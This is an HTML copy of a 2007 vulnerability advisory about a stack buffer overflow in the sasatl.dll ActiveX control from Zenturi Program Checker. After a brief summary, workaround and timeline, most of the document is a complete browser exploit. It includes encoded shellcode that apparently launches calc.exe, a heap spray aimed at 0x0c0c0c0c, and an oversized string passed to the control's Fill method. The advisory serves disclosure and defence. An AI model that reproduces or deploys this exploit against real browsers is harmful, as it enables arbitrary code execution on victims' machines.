
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">

<HTML>

<HEAD>

  <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">

  <META NAME="GENERATOR" CONTENT="GtkHTML/3.14.1">

</HEAD>

<BODY>

:. GOODFELLAS Security Research TEAM&nbsp; .:<BR>

:. http://goodfellas.shellcode.com.ar .:<BR>

<BR>

<BR>

sasatl.dll 1.5.0.531 Program Checker -&nbsp; Javascript Heap Spraying Exploit<BR>

==========================================<BR>

Internal ID: VULWAR200707101.<BR>

<BR>

<BR>

Introduction<BR>

---------------<BR>

sasatl.dll is a library included in the Program Checker Pro software <BR>

package from the Zenturi. (http://www.programchecker.com)<BR>

<BR>

<BR>

Tested In<BR>

-----------<BR>

- Windows XP SP1/SP2 english/french with IE 6.0 / 7.0.<BR>

- Windows vista Professional English/French SP1 with IE 7.0<BR>

<BR>

<BR>

Summary<BR>

------------<BR>

The Fill method is prone to a stack-based buffer-overflow vulnerability <BR>

because it fails to properly check boundaries.<BR>

<BR>

<BR>

Impact<BR>

---------<BR>

An attacker could execute arbitrary code into the remote machine.<BR>

<BR>

<BR>

Workaround<BR>

---------------<BR>

- Activate the Kill bit zero in clsid:7D6B5B29-FC7E-11D1-9288-00104B885781.<BR>

- Unregister sasatl.dll using regsvr32.<BR>

<BR>

<BR>

Timeline<BR>

----------<BR>

July 10, 2007 -- Bug published.<BR>

<BR>

<BR>

Credits<BR>

---------<BR>

* callAX &lt;callAX@shellcode.com.ar&gt;<BR>

* GoodFellas Security Research Team &lt;goodfellas.shellcode.com.ar&gt;<BR>

<BR>

Proof of Concept<BR>

----------------<BR>

<BR>

&lt;HTML&gt;<BR>

&lt;BODY&gt;<BR>

&nbsp; &lt;object id=boom classid=&quot;clsid:{7D6B5B29-FC7E-11D1-9288-00104B885781}&quot;&gt;&lt;/object&gt;<BR>

<BR>

&lt;SCRIPT&gt;<BR>

<BR>

var payLoadCode=unescape(<BR>

&quot;%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800&quot; +<BR>

&quot;%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A&quot; +<BR>

&quot;%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350&quot; +<BR>

&quot;%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40&quot; +<BR>

&quot;%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000&quot; +<BR>

&quot;%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040&quot; +<BR>

&quot;%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD&quot; +<BR>

&quot;%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40&quot; +<BR>

&quot;%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18&quot; +<BR>

&quot;%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0&quot; +<BR>

&quot;%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B&quot; +<BR>

&quot;%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24&quot; +<BR>

&quot;%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9&quot; +<BR>

&quot;%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C&quot; +<BR>

&quot;%u652E%u6578%u9000&quot;);<BR>

<BR>

<BR>

&nbsp;&nbsp;&nbsp; var spraySlide = unescape(&quot;%u9090%u9090&quot;);<BR>

&nbsp; var heapSprayToAddress = 0x0c0c0c0c;<BR>

<BR>

<BR>

&nbsp;&nbsp;&nbsp; function Tryme()<BR>

&nbsp;&nbsp;&nbsp; {<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var size_buff = 900;<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var x =&nbsp; unescape(&quot;%0C%0C%0C%0C&quot;);<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; while (x.length&lt;size_buff) x += x;<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; x = x.substring(0,size_buff);<BR>

<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; boom.Fill(x);<BR>

&nbsp;&nbsp;&nbsp; }<BR>

&nbsp;&nbsp;&nbsp; <BR>

<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; function getSpraySlide(spraySlide, spraySlideSize)<BR>

{<BR>

while (spraySlide.length*2&lt;spraySlideSize)<BR>

{<BR>

spraySlide += spraySlide;<BR>

}<BR>

spraySlide = spraySlide.substring(0,spraySlideSize/2);<BR>

return (spraySlide);<BR>

}<BR>

<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var heapBlockSize = 0x400000;<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var SizeOfHeapDataMoreover = 0x26;<BR>

&nbsp;&nbsp;&nbsp; var payLoadSize = (payLoadCode.length * 2);<BR>

<BR>

&nbsp;&nbsp;&nbsp; var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);<BR>

&nbsp;&nbsp;&nbsp; var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;<BR>

<BR>

&nbsp;&nbsp;&nbsp; var memory = new Array();<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; spraySlide = getSpraySlide(spraySlide,spraySlideSize);<BR>

<BR>

&nbsp;&nbsp;&nbsp; for (i=0;i&lt;heapBlocks;i++)<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memory[i] = spraySlide +&nbsp; payLoadCode;<BR>

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<BR>

<BR>

&lt;/SCRIPT&gt;<BR>

&lt;input language=JavaScript onclick=Tryme() type=button value=&quot;Proof of Concept&quot;&gt;<BR>

&lt;/BODY&gt;<BR>

&lt;/HTML&gt;

</BODY>

</HTML>